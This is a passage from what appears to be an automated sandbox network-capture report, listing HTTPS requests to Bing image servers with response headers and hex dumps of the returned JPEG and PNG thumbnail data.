                                                                                                                                                                                                            2024-11-21 14:17:18 UTC15530INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff e1 1c c0 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 92 87 69 00 04 00 00 00 01 00 00 00 a6 00 00 00 d2 00 60 00 00 00 01 00 00 00 60 00 00 00 01 00 00 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 31 2e 31 20 28 57 69 6e 64 6f 77 73 29 00 00 32 30 32 32 3a 30 36 3a 32 38 20 31 31 3a 31 33 3a 35 33 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 04 38 a0 03 00 04 00 00 00 01 00 00 07 80 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01
                                                                                                                                                                                                            Data Ascii: JFIF``ExifMM*bj(1r2i``Adobe Photoshop 21.1 (Windows)2022:06:28 11:13:538
                                                                                                                                                                                                            2024-11-21 14:17:18 UTC16384INData Raw: 37 dc a6 49 40 9c 50 ca 2a 4e 6a 3a 08 0d b4 54 9c d1 cd 00 47 45 14 50 01 45 14 50 01 45 14 53 b9 21 45 14 53 00 a2 8a 28 00 a9 39 a3 9a 39 a0 08 ea 4e 68 e6 8e 68 02 3a 36 d4 9c d1 cd 00 47 b6 8a 93 9a 39 a0 03 9a 8e a4 e6 8e 68 24 39 a3 9a 39 a3 9a 00 39 a7 51 45 48 05 3b 75 36 8a 76 1d c7 53 a9 b4 ea 43 0d de f5 36 ed 95 0d 14 07 31 34 72 d4 fb ea 95 4d bb f7 34 1a 53 a9 65 a9 3c 8d 22 7d ca bf a1 ac 92 cd 1d 50 83 cb fe 3f f5 75 d4 78 56 da d2 e3 e7 82 6f de 57 3d 79 a8 41 b6 7a 18 3a 6e a5 55 67 f2 36 f4 79 64 78 64 47 a3 55 8a 3f b2 6c 7a b1 a6 af 93 e6 23 d4 57 5a 85 a3 f9 9b 2b c4 77 73 d1 1f 54 a2 95 25 cc ce 36 ea db f7 b2 3d 67 6d d9 f7 eb 5b 58 d4 23 4f 92 0f f5 95 87 3c b2 4b 36 f7 af 6a 92 9b 8e a8 f9 7c 5c a9 c6 76 8e e0 f5 04 9f 3d 3d e8
                                                                                                                                                                                                            Data Ascii: 7I@P*Nj:TGEPEPES!ES(99Nhh:6G9h$999QEH;u6vSC614rM4Se<"}P?uxVoW=yAz:nUg6ydxdGU?lz#WZ+wsT%6=gm[X#O<K6j|\v==
                                                                                                                                                                                                            2024-11-21 14:17:18 UTC16384INData Raw: 24 92 bb 7d 56 c7 ed 10 c6 e9 37 97 59 70 69 11 bc de 67 93 fb ca e9 86 2d ca 1c b3 67 14 f0 2a 35 14 a9 c7 63 2e 46 8e 58 63 9d 2c fc b9 23 a8 a7 b1 9e f6 d2 39 d2 1f 2e 4a ea 20 d3 e3 4f f9 63 57 6d 6c 63 ac 5e 2d 45 7b a6 d1 c1 f3 af 78 e3 e4 d0 7e d1 34 6f 3d 58 93 c3 91 fe ed d2 ba c9 2d a3 a3 c8 ac fe bb 53 a3 35 58 1a 49 dd a3 9a 8f 45 8f ec 9b 3c 9a c6 f1 06 99 1a 5a 48 89 5d f7 91 59 7e 20 b3 fd ce f4 a7 47 15 35 35 76 4d 7c 1c 25 4d e8 78 de b1 6d ff 00 13 0f 9f fd 5c 74 fb 5f 21 26 f9 ff 00 d5 d6 f6 b9 6d e6 c3 22 7f cf 3a c1 8e 2d f3 79 09 5f 4d 09 fb 48 1f 0f 5a 8b a3 5b 45 7b 85 f7 cf e6 55 0f 32 ae 5f 59 cf e7 6c a7 e9 ba 7f fa 5c 75 b4 65 15 1d cc 27 ed aa 55 51 4a c4 16 2d fe 95 b2 7a 74 f2 ec 87 62 51 7d 14 89 37 9e 90 fe ee af c1 a6 7f
                                                                                                                                                                                                            Data Ascii: $}V7Ypig-g*5c.FXc,#9.J OcWmlc^-E{x~4o=X-S5XIE<ZH]Y~ G55vM|%Mxm\t_!&m":-y_MHZ[E{U2_Yl\ue'UQJ-ztbQ}7
                                                                                                                                                                                                            2024-11-21 14:17:18 UTC16384INData Raw: 8f bd 1b c6 ff 00 81 4b c5 5a 35 de 85 ab 49 65 3f fa e8 e3 4f 2e 4a ed be 0b eb 9f d9 33 5b 6a ff 00 b9 92 ee da 5f dd c7 e5 79 d3 48 bf ec c7 ed f7 aa 3f 18 ea f6 3e 38 9a 34 9f ec 96 57 5f f2 d2 5f 2b e7 ff 00 65 52 aa 78 73 4a d0 bc 3f ab 4b a7 ea f7 9f 68 7f 2f cc f3 3e 7f 27 ff 00 b2 a5 5a d5 69 38 4b 73 7c 3d 5a 74 ea aa 89 fb a7 b9 c1 f1 2f 5d d6 f5 0d 89 f6 bd 3a d6 38 de 4f 2e 5f f4 64 f9 7f f4 0a e4 bc 47 a2 e8 57 b0 c7 3d ad 9d a5 b5 f5 c4 8f 71 fe c5 c3 ff 00 17 fb bf 4a 83 c0 17 da 15 ec 31 fd 8a 18 6f 67 f2 fc c9 23 97 62 43 6f fe d3 2d 75 f6 b7 d7 7f 64 93 51 b2 d4 be cf 07 ee 63 bd d5 a2 b4 44 87 ca 93 ef 47 e6 7d e7 ff 00 80 d7 83 3c 0a a5 27 2b 5b d3 43 eb 29 e3 d5 68 a5 16 72 1a c5 9d 86 99 a2 58 e9 d7 b0 c3 1c 77 1b fe cd 7b f2 42 ff
                                                                                                                                                                                                            Data Ascii: KZ5Ie?O.J3[j_yH?>84W__+eRxsJ?Kh/>'Zi8Ks|=Zt/]:8O._dGW=qJ1og#bCo-udQcDG}<'+[C)hrXw{B
                                                                                                                                                                                                            2024-11-21 14:17:18 UTC16384INData Raw: 73 5b f0 d5 c5 8d d5 bc 73 5a 4d fe b3 cb a5 18 ea ec 74 e1 e2 a2 ef 20 d3 74 eb 46 92 24 b5 87 cc 9a 49 53 fd 67 df af a6 fe 10 e9 56 9a 2f c2 db 68 6c bc 98 ef af 6f 6e 7c b9 65 f9 de 35 57 db bd ff 00 dd 55 af 9e 75 18 60 d3 e7 cb c5 e6 7d 9e 3f fb f9 5d 07 85 7e 22 dd 5a 78 7a 4b 38 09 8e de 4f f8 1f fb db 2b 1c 65 09 54 51 57 b2 4e f6 2b 07 99 7d 51 ce 73 a6 e4 de 97 ed e5 62 ff 00 c6 cf 05 5f e8 fa 85 ce ad 63 a9 1b dd 1e f6 5f 32 3b 8b 9d 9f 68 f3 5b ef ee af 57 f8 65 e2 1d 35 f4 3b 1f ec eb 39 af 64 fb 34 36 f2 7e f5 f6 47 2f f0 fc b5 e2 fa ff 00 8b 35 5d 42 19 04 c2 69 2d 7f e7 df ca d8 9f 2d 68 fc 33 f1 75 d7 85 35 0f ed 18 fc 39 15 cd 8c 92 7e f7 cd ff 00 d9 77 71 59 e2 f0 d2 c4 d0 f6 76 6a da fa 86 5d 9b aa 18 b7 39 42 d1 97 a1 e9 ff 00 b4 22
                                                                                                                                                                                                            Data Ascii: s[sZMt tF$ISgV/hlon|e5WUu`}?]~"ZxzK8O+eTQWN+}Qsb_c_2;h[We5;9d46~G/5]Bi--h3u59~wqYvj]9B"
                                                                                                                                                                                                            2024-11-21 14:17:18 UTC16384INData Raw: d0 6e a1 9a 3d 0e de 34 fb 17 db a2 44 7d ff 00 7b 6a fe f1 ff 00 bf 27 dd fa d7 2f f0 93 c3 56 9a 3e 87 63 aa 6a 3e 4f 99 1c 73 5b dc c7 e6 ff 00 ac f3 26 dc bf fa 05 7a 18 7a 6b 0f 07 56 32 b9 c9 59 aa f3 54 a5 1b 44 fa 8f c3 be 20 b0 b0 f8 51 a8 ea da a4 d1 c7 25 95 92 5a 49 1d ec a8 f3 5c 4b e4 a3 46 db 3e f7 cf be b9 4f d9 df 50 8e e3 c0 71 e9 6f 34 31 dd 59 48 fe 5d b7 f1 f9 4d fb cd db 3f bb f3 d7 cf 57 da bd df 8a 35 bd 5a f5 e6 9a 4b e9 2f 5e 4f b4 dc dd ef f3 3f ed af fb bf c5 5d 5f c3 95 d4 b5 bf 10 c7 06 91 79 0d bd f5 c4 7e 5d b4 9e 6f 92 fb f7 fc 8d e6 7f 05 6f 83 a5 2a 15 67 88 a8 ee e5 6b f6 56 56 38 b1 b4 e3 88 a1 1c 34 34 51 77 5d 4f a6 28 af 2d 93 e2 45 de 85 0d b6 83 3f 93 a8 dd 5b c7 e5 dc ea de 6e ff 00 de ef 75 7d d1 af df c7 fb d5
                                                                                                                                                                                                            Data Ascii: n=4D}{j'/V>cj>Os[&zzkV2YTD Q%ZI\KF>OPqo41YH]M?W5ZK/^O?]_y~]oo*gkVV844Qw]O(-E?[nu}
                                                                                                                                                                                                            2024-11-21 14:17:18 UTC16384INData Raw: 35 cb dd 1a c3 1d 88 54 97 b4 6e 4a f6 b2 bf e7 73 9f bb d5 74 8f 12 5a c8 9a bc 59 92 38 df cb bc 8f e6 7a 3c 33 a7 a4 ba 55 cd b7 f6 ec be 4c 87 f7 76 ff 00 75 24 ff 00 81 7f 09 ad 4d 6b e1 d5 d4 7a 87 da bc 3d 2f 97 0c 9d 23 f3 b7 a3 ff 00 c0 ab 81 8c 5f d8 78 82 4b 57 8b cb 48 3e 7f f7 ff 00 dd aa c5 3a 75 f0 de e4 f5 5d 1e e6 b0 4e a4 5f b3 a9 b7 73 a2 fe c6 d6 ac a5 92 f7 fb 24 c7 f6 79 3f e7 92 7f c0 9a b3 26 b5 92 5d 5a 4c cb 2d a3 ff 00 cf 39 22 d9 bf fd da d8 f0 ff 00 89 74 99 ae bf b4 ee a6 bb b3 7f f9 f8 b1 ff 00 96 7b bf 83 6b 56 ce b9 7d 63 ad 5a c5 05 d7 95 22 47 1a 79 7a 8f f1 c7 fd fa f3 28 d6 af 4e 7c 93 86 8f 7f 21 39 7b 36 dc d5 9e c6 3d 86 9e 9f bb bc bf 9a 2b 88 e3 8f fe 59 ef f9 3f fd 55 87 71 17 d9 f5 2d d6 b7 be 7a 79 7b e3 ff 00
                                                                                                                                                                                                            Data Ascii: 5TnJstZY8z<3ULvu$Mkz=/#_xKWH>:u]N_s$y?&]ZL-9"t{kV}cZ"Gyz(N|!9{6=+Y?Uq-zy{
                                                                                                                                                                                                            2024-11-21 14:17:18 UTC16065INData Raw: 2e 52 e3 cb 92 69 65 8d e4 ff 00 57 e5 d7 51 a9 5b e9 ba 86 9f 8f ec 18 63 fd df ee ee 6c 7f f4 1f 97 8a e1 75 8b 49 f4 cd 5a 4b 59 3c ef fb 6b 5c 33 c2 a8 2b 37 73 b2 9c 68 d4 6f 92 5a ae 8c d9 33 a5 bc d1 de a7 9b 22 49 f2 47 e6 45 bf e6 ad 7d 26 7d 2a e2 eb fb 41 ff 00 77 75 e5 ba 55 3f 0c 5d c9 6f 65 1a 5b 5d cd 6e f2 49 be 48 fc ad c8 f5 7a e8 e9 10 6a 51 bc d6 92 59 cd 27 fc b4 b7 1b 3e 5f f7 7e ed 69 4e 52 a3 4c e2 c4 49 4a 3e ce ce ea fb 76 34 8d af 86 ee 3e cf 0f 89 26 9a 2b 7f f9 e9 6d 16 df f8 17 dd 6f 9f da 95 de 0d 23 cc d3 ec 9a 2b cb 2f bf 1f d9 a5 df e6 37 f7 bf d9 aa b7 89 0d 8c 71 bf da bc f8 7c cd 91 d2 5a 69 d0 5d cd f6 ad 2e 6f b3 dd 7f cb c5 bc b7 5b 12 7a 27 5a 0d 34 de ac e6 82 f6 f4 d5 37 b2 db cc d4 fe d3 b7 ba 8f fe 25 fe 6c 73
                                                                                                                                                                                                            Data Ascii: .RieWQ[cluIZKY<k\3+7shoZ3"IGE}&}*AwuU?]oe[]nIHzjQY'>_~iNRLIJ>v4>&+mo#+/7q|Zi].o[z'Z47%ls
                                                                                                                                                                                                            2024-11-21 14:17:18 UTC16384INData Raw: a8 d7 29 c9 85 93 75 bd f5 a7 a9 ce e8 1a b5 dc 5a b7 99 19 9a dd 3e 44 4f 2e 5f f5 f5 b1 1d f5 a6 a5 34 8f e6 c5 be 3f f5 72 79 55 cf de d8 5c 5b dd 79 ba 5c 52 dc 47 f2 24 7f f4 c2 a8 49 79 79 69 fe 89 7b 17 96 ff 00 7f f7 9f 2b d6 35 b0 75 14 ef 1d 1a 3d aa 98 58 d5 77 a6 ff 00 13 a1 b8 b9 b8 b4 bf d9 75 fe 91 e5 c9 be 39 22 fb e9 fe ed 75 f0 eb da 77 89 f4 ff 00 27 c4 36 70 de bf 96 9f e9 20 f9 37 7b 57 ee fc cd c3 d7 2d e0 a6 b0 d6 3c cb 2b ef f4 77 8f e7 b6 93 fe 5a ff 00 b4 9f dd f9 aa 4d 47 4a be 9f 50 92 df 45 b3 ba b8 f3 3f 71 e5 c5 17 cf 3f fc 03 b3 57 63 a7 f5 8a 0a 11 56 97 73 9e 2d 46 b7 b3 6a d2 5f 71 73 50 d0 75 5d 33 56 91 2d ae fc dd 3a 4f 9e da f3 ff 00 64 ff 00 7a 9b a6 f8 97 56 d2 a5 92 f6 f6 6f dc c9 f2 47 1c 9f 73 72 fd da 9f 46 d1
                                                                                                                                                                                                            Data Ascii: )uZ>DO._4?ryU\[y\RG$Iyyi{+5u=Xwu9"uw'6p 7{W-<+wZMGJPE?q?WcVs-Fj_qsPu]3V-:OdzVoGsrF
                                                                                                                                                                                                            2024-11-21 14:17:18 UTC16384INData Raw: 2f 71 e0 9b 6d 39 f4 79 bf b5 7c c4 ff 00 55 bf c9 93 fd ef fd 0b e5 a5 85 c2 aa 90 84 a7 79 6b bf a1 d5 8d c6 ba 2e a4 20 d4 6c ba 99 7a 1e a7 61 fb b4 bd d4 ae ec a0 93 fd 1f cc ff 00 a6 5f c4 ab d3 ef 57 47 1d 9c 7a 27 8f 35 6d 47 4b fe cf 92 3f 33 cc 8f cd 97 7a 47 16 c4 7d cd 2f dd ff 00 38 ae 4f c1 5e 11 ff 00 84 eb ed d1 e9 9a 95 a5 94 7a 75 b7 99 2d c5 ce ff 00 93 e7 ff 00 e2 aa 78 2f a0 f0 fe ad 1f 86 bc 49 34 37 bf d9 d7 af 1c bf 66 97 ce 87 e5 ae fa d8 1a 72 93 f6 72 b3 b6 cf a9 e6 61 73 6a bc 8a 58 88 69 7d fb 1d dd d5 9e b5 a9 cd 73 e2 8b d8 6e ef 7f d2 61 ff 00 49 8b fd af ef 45 d3 f8 3e 5f ee d7 07 f0 9e c7 45 7d 3e 3b ad 47 ce 92 ea f6 e7 cb fd d4 5b df ff 00 1d ad 0f 8c 9f 14 f5 2b 8f 0e c9 a7 e9 93 45 64 f7 b2 27 d9 ad ad a5 de ff 00 67
                                                                                                                                                                                                            Data Ascii: /qm9y|Uyk. lza_WGz'5mGK?3zG}/8O^zu-x/I47frrasjXi}snaIE>_E}>;G[+Ed'g


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            18192.168.2.6497262.23.209.150443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:17 UTC367OUTGET /th?id=OADD2.10239359720591_10PHTLBML42K6TRZO&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90 HTTP/1.1
                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                                                                                                                                                            Host: www.bing.com
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            2024-11-21 14:17:18 UTC627INHTTP/1.1 200 OK
                                                                                                                                                                                                            Cache-Control: public, max-age=2592000
                                                                                                                                                                                                            Content-Type: image/png
                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                            Access-Control-Allow-Headers: *
                                                                                                                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                                            Timing-Allow-Origin: *
                                                                                                                                                                                                            Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
                                                                                                                                                                                                            NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                                                                                                                                                                                                            Content-Length: 1107
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:18 GMT
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=93600
                                                                                                                                                                                                            X-CDN-TraceID: 0.0dd01702.1732198638.465d6e4
                                                                                                                                                                                                            2024-11-21 14:17:18 UTC1107INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 18 00 00 00 18 08 06 00 00 00 e0 77 3d f8 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 03 e8 49 44 41 54 48 4b bd 56 df 6f 54 45 14 9e 7b 79 37 a2 bc 17 2a 7f 82 fa 2c 94 d7 96 1f 09 0f e2 0b d1 44 30 1a c5 42 4b 20 d0 90 00 89 89 3f 23 0b a1 a5 2d 82 b4 90 b4 1a 69 81 6e 63 49 20 41 5e 08 a5 85 85 6e 03 16 24 d8 b4 5d 76 bb eb da 36 e9 9c 73 c6 ef cc bd bb 4b c0 1a 5b 13 6f 72 ee f7 ed cc dd f3 cd f9 e6 cc cd 35 22 c2 ac b7 28 4a 5c f1 6f 79 fc a8 5e ff c4 fd c5 b8 0c 3b e7 e6 af f6 f0 ec b1 bd 3c d7 76 88 e6 da 0e 02 0f 2a 56 78 fb 21 9a 39 b6 87 e5 ee 10 0f 67 7e a4 9e d4 47 9c 1c dd 4d
                                                                                                                                                                                                            Data Ascii: PNGIHDRw=sRGBgAMAapHYs%%IR$IDATHKVoTE{y7*,D0BK ?#-incI A^n$]v6sK[or5"(J\oy^;<v*Vx!9g~GM


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            19192.168.2.649730150.171.28.10443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:17 UTC375OUTGET /th?id=OADD2.10239402456886_16PSERWAUMTCB5AWR&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1
                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                                                                                                                                                            Host: tse1.mm.bing.net
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            2024-11-21 14:17:18 UTC854INHTTP/1.1 200 OK
                                                                                                                                                                                                            Cache-Control: public, max-age=2592000
                                                                                                                                                                                                            Content-Length: 700910
                                                                                                                                                                                                            Content-Type: image/jpeg
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                            Access-Control-Allow-Headers: *
                                                                                                                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                                            Timing-Allow-Origin: *
                                                                                                                                                                                                            Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
                                                                                                                                                                                                            NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                            X-MSEdge-Ref: Ref A: D9A70B394778478DA34333A30B6EE9AF Ref B: EWR30EDGE1008 Ref C: 2024-11-21T14:17:18Z
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:17 GMT
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            2024-11-21 14:17:18 UTC15530INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff e1 19 70 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 20 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 92 87 69 00 04 00 00 00 01 00 00 00 a6 00 00 00 d2 00 60 00 00 00 01 00 00 00 60 00 00 00 01 00 00 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 35 2e 31 31 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 34 3a 30 39 3a 31 32 20 30 39 3a 34 35 3a 33 30 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 07 80 a0 03 00 04 00 00 00 01 00 00 04 38 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01
                                                                                                                                                                                                            Data Ascii: JFIF``pExifMM*bj(1 r2i``Adobe Photoshop 25.11 (Windows)2024:09:12 09:45:308
                                                                                                                                                                                                            2024-11-21 14:17:18 UTC16384INData Raw: dc 2d 3b cd dd 59 f1 9f e2 a9 e3 7f ef 56 2e 07 64 2b 36 59 5f 9a ad 43 b5 63 aa 2b 2e df bd 4e 59 ea 1c 59 d1 09 a4 cd 05 7c a5 0d 54 e3 97 fb b5 65 7e 68 eb 2b 1d 0a 57 21 99 15 6a 06 3b 6a d4 89 ba 3a ad 34 55 71 66 75 23 d8 85 9e 9c ae cd 4b e5 ed f9 5a 9f 1d bb 79 95 7c c8 ce 31 95 f4 25 b5 dc b5 72 12 cd f7 aa bc 31 35 5a 8e 37 58 eb 9e a6 a8 ee a5 16 b7 0c bd 23 1d b1 d3 f6 ee a6 b4 75 99 b1 04 87 75 26 76 d4 92 22 ff 00 0d 31 85 68 64 c6 6e dd 4a b4 8a 36 fd da 75 02 57 ea 2e 29 79 a6 35 25 05 16 63 7a 95 65 5a a8 bf eb 2a 65 f9 ab 39 24 6b 09 74 27 56 cd 3a a3 53 52 2d 66 6c b7 17 34 8d 43 50 a3 75 51 4c 86 40 d4 2a 54 db 68 61 b7 ee d3 b8 ad 61 98 a5 51 4e db ba 9c d1 e2 a6 e8 a4 86 ad 49 48 a9 4b 50 cd 05 c5 25 3b 63 35 0d 1b 50 52 8b 62 66 93
                                                                                                                                                                                                            Data Ascii: -;YV.d+6Y_Cc+.NYY|Te~h+W!j;j:4Uqfu#KZy|1%r15Z7X#uu&v"1hdnJ6uW.)y5%czeZ*e9$kt'V:SR-fl4CPuQL@*ThaaQNIHKP%;c5PRbf
                                                                                                                                                                                                            2024-11-21 14:17:18 UTC16384INData Raw: 82 9b e4 53 e7 f3 17 b2 66 76 c7 a3 15 a0 d1 54 4d 15 1c d7 27 d9 b2 a6 29 b8 7a b9 e5 37 ad 23 5b b5 3e 64 2e 49 76 29 c9 b9 be 5a 8b cb 66 ab ed 68 d4 7d 91 ea f9 d0 bd 9c 8a 1e 55 1e 55 5d 6b 66 a6 b4 0d 47 b4 17 23 2b f9 6a b4 2a 55 9f 2f fd 8a 4d 94 b9 82 cc 8b 14 6c a9 76 bd 35 92 8b 80 cc 52 54 9b 1e 93 63 d1 cc 80 89 82 d3 bc b1 52 6d a7 6c a7 74 04 3e 5d 2a a5 4b e5 d1 b2 8b a0 23 d9 4e 54 a7 ec 6a 55 0d 53 cc 01 1a 62 9d 45 3a a4 ae 51 56 96 91 6a 68 63 a0 b4 ae 22 a5 4d 18 a5 50 ab 4b be 95 cd 03 3b 69 b2 3b 52 e5 2a 19 0e ea 10 9e 88 63 1a 6f 34 e6 a6 d3 32 6a e1 4e a4 c5 18 a0 5c a2 ee f7 a5 cd 31 45 3b 6f b5 02 e5 62 e6 96 93 14 e5 14 0f 94 31 46 29 d8 a5 a0 ab 58 6e ca 36 53 f1 4b 40 0d db 46 d5 a5 c5 2e ca 00 f9 0e 8d be d5 63 cb a3 cb af
                                                                                                                                                                                                            Data Ascii: SfvTM')z7#[>d.Iv)Zfh}UU]kfG#+j*U/Mlv5RTcRmlt>]*K#NTjUSbE:QVjhc"MPK;i;R*co42jN\1E;ob1F)Xn6SK@F.c
                                                                                                                                                                                                            2024-11-21 14:17:18 UTC16384INData Raw: 9f 74 87 6b 3a 46 ff 00 27 f0 ff 00 08 e3 6d 7a 3f 85 7e 34 5c db f8 e3 5c f0 ef 8a b4 d8 19 b4 db eb 48 2d 2e 74 97 69 7c e8 e7 8c ed 73 8c e4 ee 1f 37 4d bc fa 57 96 f8 ba df c4 2d aa f8 ff 00 52 d4 12 4d 37 4b f1 1d c5 ba e9 da 4d c5 ac 92 b6 d8 2e b6 cd 3c 81 55 d1 7c c6 4d 8b 2b ed dd bb 8e 29 b9 a6 b4 35 a7 15 f0 b6 70 fe 17 f1 ee b5 aa 78 ff 00 50 f0 0d af 89 27 d2 34 3d 0d d6 2b 1f ec bd ad bd 93 83 2a 12 ca db 59 b7 31 db 9f bd d1 ba 57 d1 7f 06 fe 22 5e 5e ea a9 e1 5f 15 5b c7 61 a8 25 8b 35 a4 2f 04 91 4b 37 97 ee ff 00 7b 72 6d 61 eb cd 7c 4d f1 1b 4c f1 8f 80 fc 7e fe 22 b3 8e f9 6f b5 29 a3 68 7e d6 9b 99 d8 f3 fb c8 ff 00 85 ba ed ff 00 76 ba ff 00 83 77 f7 3f 15 6f bf b1 61 82 ea f3 c4 91 5a 48 af 35 dd d2 c5 f3 27 cf c3 6d d9 12 77 6d dd
                                                                                                                                                                                                            Data Ascii: tk:F'mz?~4\\H-.ti|s7MW-RM7KM.<U|M+)5pxP'4=+*Y1W"^^_[a%5/K7{rma|ML~"o)h~vw?oaZH5'mwm
                                                                                                                                                                                                            2024-11-21 14:17:18 UTC16384INData Raw: fe 71 56 24 1b 2d de 49 3e 58 d7 ef bb fd d4 c7 bd 0c 36 c8 8a de 5e e6 fb 9f ed e6 a7 98 af 66 8a fe 4f f9 c5 1e 4f f9 c5 43 ac 6b 1a 46 91 1b ff 00 6b 6b 5a 6d 86 d4 dd b2 e2 e9 55 b6 ff 00 ba 79 ae 4a fb e3 07 80 ad e4 db 0e a5 77 79 ff 00 5e 96 ad b5 ff 00 17 db 4b da 25 bb 1f b2 3b 3f 27 fc e2 9c b1 57 95 ea 1f 1d 74 f5 df fd 9f e1 7b e9 7f db bb ba 8e 2f fd 07 75 67 49 f1 e6 f9 a7 db 1f 85 ec 62 5f fa 6d a8 b7 fe ca b4 bd b4 7b 8b d9 9e cd e5 d2 ec db f7 ab c4 64 f8 e3 e2 c7 83 74 3e 17 d2 95 9b 72 a3 a4 f2 4a bb bf 0a 2d fe 32 78 cd ad 5e 4b ad 33 43 b5 ff 00 7e 09 3f f8 e5 43 c4 d3 5d 4d 23 42 4f 64 7b 92 a5 71 7f 1c 07 8e 1f c2 b3 5a f8 1e 0b 1b 8b 86 85 be dd 15 df 99 17 9d 09 f9 36 c5 70 ac 3c a9 3e f7 38 6a f3 dd 43 e3 2f 8a 9a 37 85 67 d1 ec
                                                                                                                                                                                                            Data Ascii: qV$-I>X6^fOOCkFkkZmUyJwy^K%;?'Wt{/ugIb_m{dt>rJ-2x^K3C~?C]M#BOd{qZ6p<>8jC/7g
                                                                                                                                                                                                            2024-11-21 14:17:18 UTC16384INData Raw: 90 9d 63 a0 d4 12 55 8f ce 8e ee 48 b6 fd f4 fe 1a c9 9b 54 d4 e0 fd dc 70 6e 8d b6 ff 00 1f f0 fd 3a d2 e9 ba ac f0 48 ed 24 7e 6f fc 0f 6d 1a b5 cf da 2e bf d1 e3 91 55 b6 b7 c9 fc 1e b5 31 c3 b8 bf 78 ce 55 6e ae 8c cd 4a 5b 99 67 7f 33 cc 56 6d bf 22 7f 76 a9 db c5 b6 b5 2f a2 b9 97 e6 69 24 b8 ff 00 6d 2a 6b 7d 22 54 d8 d7 5f ba dd fe ed 75 42 36 47 1c ae d9 1e 93 2b 5b c8 ed fe a9 7f 8d f6 2b 56 ad 9d bc 1f 6a 85 6e 20 93 51 93 67 fa 97 76 55 4e fd 14 fe 94 cf 2f 4f 82 34 8e 19 24 95 99 3f 7d bd 17 6e ea b1 63 6f a7 ad d2 7f af 95 77 ff 00 bb 57 18 ea 0e 4d 23 5b 47 b2 b3 82 74 be 9b 45 b1 ba 93 ee bd a3 a3 79 0f f3 7c c7 e4 fb ad fe ed 63 f8 8b c3 9a 2f 8b e4 be 8d b5 2b ad 1a 6b 0b b5 df 63 0e 97 24 b6 68 c3 e5 56 82 47 2c fc 47 bf af cb e6 73 85
                                                                                                                                                                                                            Data Ascii: cUHTpn:H$~om.U1xUnJ[g3Vm"v/i$m*k}"T_uB6G+[+Vjn QgvUN/O4$?}ncowWM#[GtEy|c/+kc$hVG,Gs
